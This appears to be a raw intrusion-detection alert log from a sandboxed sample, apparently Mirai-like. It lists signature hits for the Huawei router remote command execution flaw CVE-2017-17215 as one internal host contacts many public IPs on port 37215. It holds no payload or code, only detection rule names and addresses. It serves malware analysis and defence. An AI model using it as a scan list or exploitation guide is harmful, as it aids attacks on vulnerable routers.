                                                    07/10/24-08:26:29.890677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004237215192.168.2.14156.138.204.176
                                                    07/10/24-08:27:11.512304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987237215192.168.2.1441.69.190.57
                                                    07/10/24-08:27:23.849464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298237215192.168.2.14197.233.226.104
                                                    07/10/24-08:27:13.844638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101837215192.168.2.14197.151.229.194
                                                    07/10/24-08:27:24.912875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221637215192.168.2.14157.53.163.172
                                                    07/10/24-08:26:47.864255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117037215192.168.2.14169.115.185.78
                                                    07/10/24-08:26:22.217078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718237215192.168.2.1453.95.194.88
                                                    07/10/24-08:27:05.138827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497237215192.168.2.14197.79.235.8
                                                    07/10/24-08:27:10.569489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422237215192.168.2.14197.37.40.53
                                                    07/10/24-08:27:23.773863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429037215192.168.2.14115.37.62.132
                                                    07/10/24-08:27:27.155928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579837215192.168.2.1441.63.196.227
                                                    07/10/24-08:27:27.158777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808037215192.168.2.14188.2.35.83
                                                    07/10/24-08:27:33.875122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549837215192.168.2.14197.66.72.165
                                                    07/10/24-08:27:10.616142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883637215192.168.2.14118.216.106.255
                                                    07/10/24-08:27:32.606203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591837215192.168.2.1423.150.14.30
                                                    07/10/24-08:27:17.056962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702437215192.168.2.14197.128.167.146
                                                    07/10/24-08:26:11.544307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419037215192.168.2.14157.250.95.47
                                                    07/10/24-08:27:17.093189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974037215192.168.2.1481.127.135.160
                                                    07/10/24-08:27:20.439109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303237215192.168.2.14197.62.214.236
                                                    07/10/24-08:26:29.890677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695637215192.168.2.14157.6.46.147
                                                    07/10/24-08:27:08.389316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082837215192.168.2.14114.189.16.61
                                                    07/10/24-08:27:19.298616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961037215192.168.2.14197.146.94.87
                                                    07/10/24-08:27:33.764696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842237215192.168.2.14197.201.159.166
                                                    07/10/24-08:27:10.635784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139437215192.168.2.1425.38.142.215
                                                    07/10/24-08:27:17.041002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924837215192.168.2.1441.227.220.193
                                                    07/10/24-08:27:05.116330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875037215192.168.2.1441.255.240.53
                                                    07/10/24-08:26:26.602369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034637215192.168.2.14157.1.8.171
                                                    07/10/24-08:27:19.157761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984037215192.168.2.1472.251.212.208
                                                    07/10/24-08:26:41.625693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313837215192.168.2.14122.197.221.92
                                                    07/10/24-08:26:43.757407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437637215192.168.2.14157.16.101.218
                                                    07/10/24-08:27:05.182462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266837215192.168.2.1441.59.212.69
                                                    07/10/24-08:27:23.939164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218837215192.168.2.14197.9.154.192
                                                    07/10/24-08:26:11.115720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4561637215192.168.2.1441.197.151.231
                                                    07/10/24-08:26:22.299447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073437215192.168.2.14197.252.23.137
                                                    07/10/24-08:26:59.539411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486037215192.168.2.14107.9.198.124
                                                    07/10/24-08:26:23.354111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000237215192.168.2.14197.189.8.241
                                                    07/10/24-08:27:05.131272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729237215192.168.2.14157.141.19.162
                                                    07/10/24-08:27:17.078747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412237215192.168.2.14197.138.194.201
                                                    07/10/24-08:26:28.929842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293437215192.168.2.14197.163.27.232
                                                    07/10/24-08:26:17.986594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002437215192.168.2.14157.177.65.150
                                                    07/10/24-08:26:55.462338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711837215192.168.2.1441.153.76.146
                                                    07/10/24-08:27:31.548799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459837215192.168.2.14197.195.37.217
                                                    07/10/24-08:27:05.140242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385037215192.168.2.1441.11.163.72
                                                    07/10/24-08:27:28.128256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268437215192.168.2.14197.100.8.124
                                                    07/10/24-08:27:05.233513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314037215192.168.2.14157.88.131.218
                                                    07/10/24-08:26:59.851109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656837215192.168.2.14197.191.221.127
                                                    07/10/24-08:26:38.636567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850837215192.168.2.1474.110.0.101
                                                    07/10/24-08:26:53.177633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196037215192.168.2.1441.187.143.114
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047437215192.168.2.14197.239.117.12
                                                    07/10/24-08:26:20.171305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766437215192.168.2.1441.32.79.87
                                                    07/10/24-08:26:47.901324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859237215192.168.2.1441.43.63.148
                                                    07/10/24-08:26:41.501258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334437215192.168.2.14197.53.163.221
                                                    07/10/24-08:26:59.780111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499437215192.168.2.14197.38.73.83
                                                    07/10/24-08:27:05.212811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706837215192.168.2.1441.227.31.170
                                                    07/10/24-08:27:32.590105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897837215192.168.2.1441.80.6.233
                                                    07/10/24-08:27:17.079394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661037215192.168.2.14157.90.88.229
                                                    07/10/24-08:26:13.790493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389837215192.168.2.1441.16.86.76
                                                    07/10/24-08:27:14.821259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720837215192.168.2.14157.111.224.99
                                                    07/10/24-08:26:55.432680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991837215192.168.2.14162.125.112.46
                                                    07/10/24-08:27:08.392064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958637215192.168.2.14157.16.54.156
                                                    07/10/24-08:26:49.791471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469037215192.168.2.1441.153.162.207
                                                    07/10/24-08:27:13.930927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906237215192.168.2.14157.133.195.159
                                                    07/10/24-08:26:52.064971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956037215192.168.2.14197.145.64.138
                                                    07/10/24-08:26:26.600154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685237215192.168.2.1441.15.122.193
                                                    07/10/24-08:26:11.186644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843837215192.168.2.14157.144.214.203
                                                    07/10/24-08:26:34.215395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442037215192.168.2.1441.57.0.218
                                                    07/10/24-08:26:20.188869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198037215192.168.2.14157.153.89.82
                                                    07/10/24-08:27:02.709272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474437215192.168.2.14148.103.69.58
                                                    07/10/24-08:26:49.828645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016837215192.168.2.14197.8.44.236
                                                    07/10/24-08:27:02.812421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695237215192.168.2.14220.101.26.166
                                                    07/10/24-08:26:25.457163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735837215192.168.2.14197.188.208.14
                                                    07/10/24-08:27:08.339204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201837215192.168.2.1441.255.178.107
                                                    07/10/24-08:26:28.890895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842837215192.168.2.14157.193.165.222
                                                    07/10/24-08:26:38.548975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744237215192.168.2.1441.109.134.1
                                                    07/10/24-08:27:11.560548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911637215192.168.2.14157.104.94.78
                                                    07/10/24-08:26:28.633742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632037215192.168.2.14150.34.98.174
                                                    07/10/24-08:27:10.558738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586037215192.168.2.1441.10.188.133
                                                    07/10/24-08:26:55.470816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159237215192.168.2.1441.20.43.8
                                                    07/10/24-08:27:10.613863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765437215192.168.2.1441.225.2.219
                                                    07/10/24-08:26:59.814735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4399437215192.168.2.14157.162.230.160
                                                    07/10/24-08:27:22.773941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860037215192.168.2.14189.19.55.211
                                                    07/10/24-08:26:13.785071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928237215192.168.2.14197.111.106.252
                                                    07/10/24-08:27:22.873299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316237215192.168.2.14197.10.33.103
                                                    07/10/24-08:27:23.938620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655237215192.168.2.14212.143.108.202
                                                    07/10/24-08:27:13.960934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386037215192.168.2.1445.127.154.81
                                                    07/10/24-08:27:08.371884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096237215192.168.2.14157.34.114.148
                                                    07/10/24-08:27:23.832820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940637215192.168.2.14197.113.26.209
                                                    07/10/24-08:26:22.229763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062037215192.168.2.1441.81.105.236
                                                    07/10/24-08:26:43.814052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201637215192.168.2.14197.234.11.190
                                                    07/10/24-08:26:34.223623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505837215192.168.2.14157.94.7.26
                                                    07/10/24-08:26:20.113907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662037215192.168.2.14197.157.184.88
                                                    07/10/24-08:26:57.574047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.1441.94.195.139
                                                    07/10/24-08:26:26.602749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384437215192.168.2.14197.217.92.1
                                                    07/10/24-08:26:31.106544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273837215192.168.2.14197.120.17.47
                                                    07/10/24-08:26:25.508243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343837215192.168.2.1441.207.149.184
                                                    07/10/24-08:27:08.415369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555837215192.168.2.14197.41.208.211
                                                    07/10/24-08:27:08.406759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053037215192.168.2.14197.133.100.229
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808037215192.168.2.14157.214.136.230
                                                    07/10/24-08:26:11.587668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034837215192.168.2.14157.51.240.162
                                                    07/10/24-08:26:28.911509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742837215192.168.2.1441.78.22.204
                                                    07/10/24-08:26:28.833295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731437215192.168.2.1441.242.188.110
                                                    07/10/24-08:26:41.472722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116637215192.168.2.14157.162.67.200
                                                    07/10/24-08:26:22.223907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980437215192.168.2.14157.248.56.191
                                                    07/10/24-08:26:14.657755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360837215192.168.2.14197.70.151.58
                                                    07/10/24-08:27:08.375967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794637215192.168.2.14157.57.228.85
                                                    07/10/24-08:26:11.571607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792637215192.168.2.14116.186.51.211
                                                    07/10/24-08:27:19.273517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.14197.112.170.66
                                                    07/10/24-08:26:15.871447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276037215192.168.2.14157.64.58.147
                                                    07/10/24-08:26:47.988456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022637215192.168.2.1441.5.90.104
                                                    07/10/24-08:26:59.781725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053237215192.168.2.14157.149.95.175
                                                    07/10/24-08:26:13.758609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536037215192.168.2.14197.236.77.231
                                                    07/10/24-08:27:23.917453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876037215192.168.2.1441.92.21.243
                                                    07/10/24-08:26:13.766150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322437215192.168.2.1441.152.177.189
                                                    07/10/24-08:26:53.196604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142237215192.168.2.14197.96.243.241
                                                    07/10/24-08:27:33.751241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097637215192.168.2.1441.222.90.5
                                                    07/10/24-08:26:49.845196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631037215192.168.2.1441.170.107.156
                                                    07/10/24-08:27:22.853390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621437215192.168.2.14197.55.185.99
                                                    07/10/24-08:26:34.217432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998037215192.168.2.14157.191.6.152
                                                    07/10/24-08:26:23.273552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478637215192.168.2.1444.109.37.136
                                                    07/10/24-08:26:28.837976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812037215192.168.2.14169.1.91.174
                                                    07/10/24-08:27:32.596186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160837215192.168.2.14157.30.69.244
                                                    07/10/24-08:26:41.562596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359637215192.168.2.1441.32.151.108
                                                    07/10/24-08:26:25.477490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627637215192.168.2.14197.44.72.194
                                                    07/10/24-08:26:28.873311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893837215192.168.2.14157.164.166.194
                                                    07/10/24-08:27:31.448205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993637215192.168.2.1419.53.196.246
                                                    07/10/24-08:26:20.117680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275637215192.168.2.1441.22.27.42
                                                    07/10/24-08:26:20.137908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985837215192.168.2.1441.221.235.198
                                                    07/10/24-08:26:48.002361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728637215192.168.2.14118.154.66.18
                                                    07/10/24-08:26:18.001524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850037215192.168.2.14197.230.148.136
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373437215192.168.2.1472.244.36.13
                                                    07/10/24-08:27:20.453874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366237215192.168.2.14157.216.55.44
                                                    07/10/24-08:26:25.493700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782437215192.168.2.1465.174.35.87
                                                    07/10/24-08:26:36.395459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352437215192.168.2.14157.131.101.97
                                                    07/10/24-08:26:42.399244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538437215192.168.2.1441.214.170.146
                                                    07/10/24-08:27:03.000596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564437215192.168.2.14197.198.99.254
                                                    07/10/24-08:26:13.824276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594637215192.168.2.1495.231.59.84
                                                    07/10/24-08:26:15.864839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.14197.250.21.25
                                                    07/10/24-08:26:41.364208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402837215192.168.2.14206.145.97.172
                                                    07/10/24-08:27:17.083143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.14157.29.83.161
                                                    07/10/24-08:27:22.548548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532237215192.168.2.1441.150.132.25
                                                    07/10/24-08:26:42.380057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875637215192.168.2.14223.117.27.99
                                                    07/10/24-08:27:23.501791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584237215192.168.2.1441.100.120.17
                                                    07/10/24-08:27:17.019850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575037215192.168.2.14166.225.11.41
                                                    07/10/24-08:27:19.303289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.14197.94.224.81
                                                    07/10/24-08:27:30.515312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591837215192.168.2.14197.85.123.173
                                                    07/10/24-08:26:38.609336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577237215192.168.2.14156.103.114.190
                                                    07/10/24-08:27:20.477184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400037215192.168.2.14157.176.6.62
                                                    07/10/24-08:27:28.147073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513237215192.168.2.14148.196.72.237
                                                    07/10/24-08:27:32.567631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862637215192.168.2.1441.104.107.55
                                                    07/10/24-08:27:30.523582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029637215192.168.2.14197.178.144.148
                                                    07/10/24-08:26:43.626199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953637215192.168.2.1499.226.241.110
                                                    07/10/24-08:26:23.357682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467037215192.168.2.14157.135.51.21
                                                    07/10/24-08:26:13.758610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920437215192.168.2.14197.163.145.16
                                                    07/10/24-08:27:13.822075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919437215192.168.2.14157.52.172.177
                                                    07/10/24-08:27:08.326825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455237215192.168.2.14157.210.4.7
                                                    07/10/24-08:27:07.268531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511237215192.168.2.14197.21.162.228
                                                    07/10/24-08:26:55.449293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423637215192.168.2.1477.124.96.251
                                                    07/10/24-08:26:45.611390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708637215192.168.2.14180.101.33.131
                                                    07/10/24-08:26:43.672613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291437215192.168.2.1476.158.43.1
                                                    07/10/24-08:27:23.901569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481837215192.168.2.1441.201.232.166
                                                    07/10/24-08:26:33.222774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576437215192.168.2.14197.26.53.246
                                                    07/10/24-08:27:32.565962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342237215192.168.2.14157.36.169.0
                                                    07/10/24-08:27:08.383825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631237215192.168.2.1441.17.120.132
                                                    07/10/24-08:26:17.984415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463237215192.168.2.14144.8.138.73
                                                    07/10/24-08:26:43.848073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956837215192.168.2.14182.111.31.197
                                                    07/10/24-08:26:47.883651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248837215192.168.2.1441.21.107.42
                                                    07/10/24-08:27:23.917692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428037215192.168.2.1441.113.48.112
                                                    07/10/24-08:26:43.626210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034237215192.168.2.1441.251.230.155
                                                    07/10/24-08:26:53.147392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857637215192.168.2.14197.122.30.154
                                                    07/10/24-08:26:33.246495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228237215192.168.2.14208.28.4.229
                                                    07/10/24-08:26:55.437188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624637215192.168.2.1441.188.212.186
                                                    07/10/24-08:26:13.767768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538837215192.168.2.1441.225.31.25
                                                    07/10/24-08:26:28.693119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504437215192.168.2.14110.32.21.244
                                                    07/10/24-08:27:32.606203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198237215192.168.2.1441.103.248.143
                                                    07/10/24-08:26:26.482822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738437215192.168.2.14157.53.66.35
                                                    07/10/24-08:27:02.997296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501237215192.168.2.14107.186.127.165
                                                    07/10/24-08:26:59.577459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630037215192.168.2.1441.91.252.124
                                                    07/10/24-08:26:55.408073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332237215192.168.2.142.98.62.171
                                                    07/10/24-08:27:22.929011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703837215192.168.2.14197.152.77.141
                                                    07/10/24-08:26:15.788826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957837215192.168.2.14157.52.121.25
                                                    07/10/24-08:27:33.852238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865437215192.168.2.14155.9.17.125
                                                    07/10/24-08:27:14.853796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708037215192.168.2.14197.6.155.107
                                                    07/10/24-08:27:33.719591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482237215192.168.2.1441.158.219.207
                                                    07/10/24-08:26:57.670364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6012437215192.168.2.1441.73.37.202
                                                    07/10/24-08:26:43.778762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010037215192.168.2.14157.102.115.247
                                                    07/10/24-08:27:17.035862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783637215192.168.2.14157.132.37.106
